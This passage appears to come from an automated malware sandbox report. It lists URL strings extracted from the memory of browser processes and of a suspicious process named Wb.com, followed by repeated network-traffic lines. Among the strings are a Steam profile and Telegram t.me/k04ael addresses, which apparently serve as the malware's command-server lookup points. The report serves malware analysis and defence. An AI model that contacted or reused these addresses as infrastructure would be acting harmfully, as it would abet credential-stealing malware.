                Source: chrome.exe, 00000011.00000003.2559388809.000047E400A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2643637698.000047E400E54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2643588930.000047E400E4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
                Source: chrome.exe, 00000011.00000002.2639357214.000047E4004E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559388809.000047E400A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2643588930.000047E400E4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
                Source: chrome.exe, 00000011.00000002.2639357214.000047E4004E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
                Source: msedge.exe, 00000014.00000003.2700592502.00005B8002464000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700730195.00005B800246C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700974412.00005B8002470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/AddSession
                Source: msedge.exe, 00000014.00000003.2700592502.00005B8002464000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700730195.00005B800246C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700974412.00005B8002470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/Logout
                Source: msedge.exe, 00000014.00000003.2700592502.00005B8002464000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700730195.00005B800246C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700974412.00005B8002470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
                Source: msedge.exe, 00000014.00000003.2700592502.00005B8002464000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700730195.00005B800246C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700974412.00005B8002470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/MergeSession
                Source: msedge.exe, 00000014.00000003.2700592502.00005B8002464000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700730195.00005B800246C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700974412.00005B8002470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/OAuthLogin
                Source: msedge.exe, 00000014.00000003.2700592502.00005B8002464000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700730195.00005B800246C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700974412.00005B8002470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
                Source: msedge.exe, 00000014.00000003.2700592502.00005B8002464000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700730195.00005B800246C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700974412.00005B8002470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
                Source: msedge.exe, 00000014.00000003.2700592502.00005B8002464000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700730195.00005B800246C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700974412.00005B8002470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
                Source: msedge.exe, 00000014.00000003.2700592502.00005B8002464000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700730195.00005B800246C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700974412.00005B8002470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
                Source: msedge.exe, 00000014.00000003.2700592502.00005B8002464000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700730195.00005B800246C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700974412.00005B8002470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
                Source: msedge.exe, 00000014.00000003.2700592502.00005B8002464000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700730195.00005B800246C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700974412.00005B8002470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
                Source: msedge.exe, 00000014.00000003.2700592502.00005B8002464000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700730195.00005B800246C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700974412.00005B8002470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
                Source: msedge.exe, 00000014.00000003.2700592502.00005B8002464000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700730195.00005B800246C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700974412.00005B8002470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
                Source: msedge.exe, 00000014.00000003.2700592502.00005B8002464000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700730195.00005B800246C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700974412.00005B8002470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
                Source: chrome.exe, 00000011.00000003.2561579862.000047E400E38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2641447831.000047E400994000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2641806972.000047E400A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
                Source: chrome.exe, 00000011.00000003.2563818278.000047E4010CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2564082691.000047E40120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563702916.000047E4003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
                Source: chrome.exe, 00000011.00000002.2641806972.000047E400A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://policies.google.com/
                Source: chrome.exe, 00000011.00000003.2589240103.000047E40140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
                Source: chrome.exe, 00000011.00000003.2589240103.000047E40140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
                Source: chrome.exe, 00000011.00000003.2589240103.000047E40140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                Source: chrome.exe, 00000011.00000003.2589240103.000047E40140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
                Source: chrome.exe, 00000011.00000003.2589240103.000047E40140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                Source: chrome.exe, 00000011.00000002.2637512561.000047E400098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
                Source: chrome.exe, 00000011.00000002.2637542005.000047E4000B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
                Source: chrome.exe, 00000011.00000002.2638276092.000047E4001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
                Source: chrome.exe, 00000011.00000003.2589240103.000047E40140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2
                Source: chrome.exe, 00000011.00000003.2589240103.000047E40140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comJv
                Source: chrome.exe, 00000011.00000002.2640746569.000047E4007CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2639357214.000047E4004E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2642438846.000047E400C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640901512.000047E40080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
                Source: chrome.exe, 00000011.00000002.2640746569.000047E4007CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2639357214.000047E4004E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2642438846.000047E400C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640901512.000047E40080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
                Source: chrome.exe, 00000011.00000002.2640691773.000047E4007C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
                Source: chrome.exe, 00000011.00000002.2639050533.000047E400468000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2602920427.000047E401C4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2599000760.000047E401BBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2602951552.000047E401D04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
                Source: Wb.com, 0000000C.00000003.2355126342.0000000001BE3000.00000004.00000020.00020000.00000000.sdmp, Wb.com, 0000000C.00000003.2354948680.0000000001C70000.00000004.00000020.00020000.00000000.sdmp, Wb.com, 0000000C.00000002.3031023113.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Wb.com, 0000000C.00000003.2354981968.0000000004C0A000.00000004.00000800.00020000.00000000.sdmp, Wb.com, 0000000C.00000003.2354920999.0000000004509000.00000004.00000800.00020000.00000000.sdmp, Wb.com, 0000000C.00000002.3030645181.0000000001C6F000.00000004.00000020.00020000.00000000.sdmp, Wb.com, 0000000C.00000002.3028437270.00000000003D1000.00000040.00001000.00020000.00000000.sdmp, Wb.com, 0000000C.00000003.2355154530.0000000004585000.00000004.00000800.00020000.00000000.sdmp, Wb.com, 0000000C.00000003.2355096916.0000000001C94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512
                Source: Wb.com, 0000000C.00000003.2355096916.0000000001C94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512m0nk3Mozilla/5.0
                Source: Wb.com, 0000000C.00000002.3034927498.0000000006979000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: Wb.com, 0000000C.00000002.3034927498.0000000006979000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: Wb.com, 0000000C.00000003.2354835954.0000000004585000.00000004.00000800.00020000.00000000.sdmp, Wb.com, 0000000C.00000003.2355039530.0000000004585000.00000004.00000800.00020000.00000000.sdmp, Wb.com, 0000000C.00000003.2354815842.00000000045B3000.00000004.00000800.00020000.00000000.sdmp, Wb.com, 0000000C.00000003.2354920999.0000000004509000.00000004.00000800.00020000.00000000.sdmp, Wb.com, 0000000C.00000003.2354749747.0000000001C70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.m
                Source: Wb.com, 0000000C.00000002.3031023113.0000000004500000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/
                Source: Wb.com, 0000000C.00000002.3031023113.0000000004500000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/5Y
                Source: Wb.com, 0000000C.00000003.2354835954.0000000004585000.00000004.00000800.00020000.00000000.sdmp, Wb.com, 0000000C.00000003.2355039530.0000000004585000.00000004.00000800.00020000.00000000.sdmp, Wb.com, 0000000C.00000003.2354815842.00000000045B3000.00000004.00000800.00020000.00000000.sdmp, Wb.com, 0000000C.00000003.2354920999.0000000004509000.00000004.00000800.00020000.00000000.sdmp, Wb.com, 0000000C.00000003.2354749747.0000000001C70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04
                Source: Wb.com, 0000000C.00000003.2355126342.0000000001BE3000.00000004.00000020.00020000.00000000.sdmp, Wb.com, 0000000C.00000002.3031181433.0000000004591000.00000004.00000800.00020000.00000000.sdmp, Wb.com, 0000000C.00000003.2354948680.0000000001C70000.00000004.00000020.00020000.00000000.sdmp, Wb.com, 0000000C.00000002.3028437270.000000000041D000.00000040.00001000.00020000.00000000.sdmp, Wb.com, 0000000C.00000002.3031023113.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Wb.com, 0000000C.00000003.2354981968.0000000004C0A000.00000004.00000800.00020000.00000000.sdmp, Wb.com, 0000000C.00000003.2354920999.0000000004509000.00000004.00000800.00020000.00000000.sdmp, Wb.com, 0000000C.00000002.3030645181.0000000001C6F000.00000004.00000020.00020000.00000000.sdmp, Wb.com, 0000000C.00000002.3028437270.00000000003D1000.00000040.00001000.00020000.00000000.sdmp, Wb.com, 0000000C.00000003.2355154530.0000000004585000.00000004.00000800.00020000.00000000.sdmp, Wb.com, 0000000C.00000003.2355096916.0000000001C94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04ael
                Source: Wb.com, 0000000C.00000002.3031181433.0000000004591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04ael.0c
                Source: Wb.com, 0000000C.00000002.3031181433.0000000004591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04ael20W
                Source: Wb.com, 0000000C.00000003.2355096916.0000000001C94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04aelm0nk3Mozilla/5.0
                Source: chrome.exe, 00000011.00000002.2641749171.000047E400A18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t0.gstatic.com/faviconV2
                Source: chrome.exe, 00000011.00000002.2638276092.000047E4001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tasks.googleapis.com/
                Source: Wb.com, 0000000C.00000002.3031181433.0000000004591000.00000004.00000800.00020000.00000000.sdmp, Wb.com, 0000000C.00000002.3028437270.000000000041D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                Source: Wb.com, 0000000C.00000002.3032206760.000000000475E000.00000004.00000800.00020000.00000000.sdmp, Wb.com, 0000000C.00000002.3032362524.00000000047F7000.00000004.00000800.00020000.00000000.sdmp, 7GLXT0.12.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
                Source: Wb.com, 0000000C.00000002.3031181433.00000000045E3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2642271555.000047E400BBC000.00000004.00000800.00020000.00000000.sdmp, MO8G47.12.drString found in binary or memory: https://www.ecosia.org/newtab/
                Source: chrome.exe, 00000011.00000002.2642382450.000047E400C0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=
                Source: chrome.exe, 00000011.00000002.2642382450.000047E400C0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
                Source: chrome.exe, 00000011.00000002.2642382450.000047E400C0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
                Source: ChoForgot.exe, Wb.com.2.dr, Improve.9.dr, Convergence.9.drString found in binary or memory: https://www.globalsign.com/repository/0
                Source: chrome.exe, 00000011.00000003.2580999674.000047E4002A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com
                Source: chrome.exe, 00000011.00000002.2640691773.000047E4007C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
                Source: chrome.exe, 00000011.00000002.2640691773.000047E4007C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: chrome.exe, 00000011.00000003.2558088225.000047E400D80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                Source: chrome.exe, 00000011.00000002.2637078288.000047E400013000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/Char
                Source: chrome.exe, 00000011.00000002.2640930970.000047E40081C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/Charii3
                Source: chrome.exe, 00000011.00000002.2637078288.000047E400013000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
                Source: chrome.exe, 00000011.00000002.2637078288.000047E400013000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/ddljson?async=ntp:27
                Source: chrome.exe, 00000011.00000002.2644561210.000047E401184000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/newtab_promos
                Source: content_new.js.22.dr, content.js.22.drString found in binary or memory: https://www.google.com/chrome
                Source: chrome.exe, 00000011.00000003.2589240103.000047E40140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
                Source: chrome.exe, 00000011.00000003.2589240103.000047E40140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
                Source: chrome.exe, 00000011.00000002.2640778355.000047E4007E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640506644.000047E40072C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2638276092.000047E4001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2641393049.000047E400968000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/
                Source: chrome.exe, 00000011.00000002.2640778355.000047E4007E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2638276092.000047E4001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2641393049.000047E400968000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/gs
                Source: chrome.exe, 00000011.00000002.2640506644.000047E40072C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/gspH
                Source: Wb.com, 0000000C.00000002.3032389782.0000000004885000.00000004.00000800.00020000.00000000.sdmp, Wb.com, 0000000C.00000002.3031181433.00000000045E3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2639884049.000047E4005E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2639529411.000047E40050C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640660218.000047E40078C000.00000004.00000800.00020000.00000000.sdmp, IMGV3W.12.dr, Web Data.22.dr, MO8G47.12.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: chrome.exe, 00000011.00000002.2639884049.000047E4005E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icoG
                Source: chrome.exe, 00000011.00000002.2639050533.000047E400468000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2602920427.000047E401C4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2599000760.000047E401BBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2602951552.000047E401D04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
                Source: chrome.exe, 00000011.00000003.2602951552.000047E401D04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
                Source: chrome.exe, 00000011.00000003.2589240103.000047E40140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
                Source: chrome.exe, 00000011.00000003.2563702916.000047E4003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=$
                Source: chrome.exe, 00000011.00000002.2639357214.000047E4004E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
                Source: chrome.exe, 00000011.00000002.2641749171.000047E400A18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/undo
                Source: chrome.exe, 00000011.00000003.2580999674.000047E4002A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
                Source: chrome.exe, 00000011.00000002.2637078288.000047E400013000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
                Source: chrome.exe, 00000011.00000003.2589240103.000047E40140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida2
                Source: chrome.exe, 00000011.00000003.2593303220.000047E4016B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2593337095.000047E4016BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
                Source: chrome.exe, 00000011.00000003.2589240103.000047E40140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
                Source: chrome.exe, 00000011.00000003.2589240103.000047E40140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
                Source: chrome.exe, 00000011.00000002.2638343850.000047E40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
                Source: chrome.exe, 00000011.00000002.2638343850.000047E40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
                Source: chrome.exe, 00000011.00000002.2638343850.000047E40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v4/token
                Source: chrome.exe, 00000011.00000002.2638343850.000047E40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
                Source: chrome.exe, 00000011.00000002.2640691773.000047E4007C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
                Source: chrome.exe, 00000011.00000002.2640691773.000047E4007C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                Source: chrome.exe, 00000011.00000002.2639357214.000047E4004E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
                Source: chrome.exe, 00000011.00000002.2643268322.000047E400DC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                Source: chrome.exe, 00000011.00000002.2647254085.000047E401C90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
                Source: chrome.exe, 00000011.00000003.2602669122.000047E401C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2598862725.000047E401C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2599081550.000047E401CD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2598920048.000047E401CE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2598975984.000047E401CEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2598700108.000047E401038000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2602920427.000047E401C4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2602951552.000047E401D04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2647254085.000047E401C90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
                Source: chrome.exe, 00000011.00000003.2602920427.000047E401C4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2599000760.000047E401BBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2602951552.000047E401D04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp
                Source: chrome.exe, 00000011.00000003.2602920427.000047E401C4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2599000760.000047E401BBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2602951552.000047E401D04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
                Source: Wb.com, 0000000C.00000002.3034927498.0000000006979000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
                Source: Wb.com, 0000000C.00000002.3034927498.0000000006979000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
                Source: Wb.com, 0000000C.00000002.3034927498.0000000006979000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: Wb.com, 0000000C.00000002.3032206760.000000000475E000.00000004.00000800.00020000.00000000.sdmp, Wb.com, 0000000C.00000002.3032362524.00000000047F7000.00000004.00000800.00020000.00000000.sdmp, 7GLXT0.12.drString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
                Source: chrome.exe, 00000011.00000002.2640291471.000047E4006AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/:
                Source: chrome.exe, 00000011.00000002.2640291471.000047E4006AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
                Source: chrome.exe, 00000011.00000002.2640291471.000047E4006AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J
                Source: chrome.exe, 00000011.00000002.2640291471.000047E4006AB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2638622459.000047E4002D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
                Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
                Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
                Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
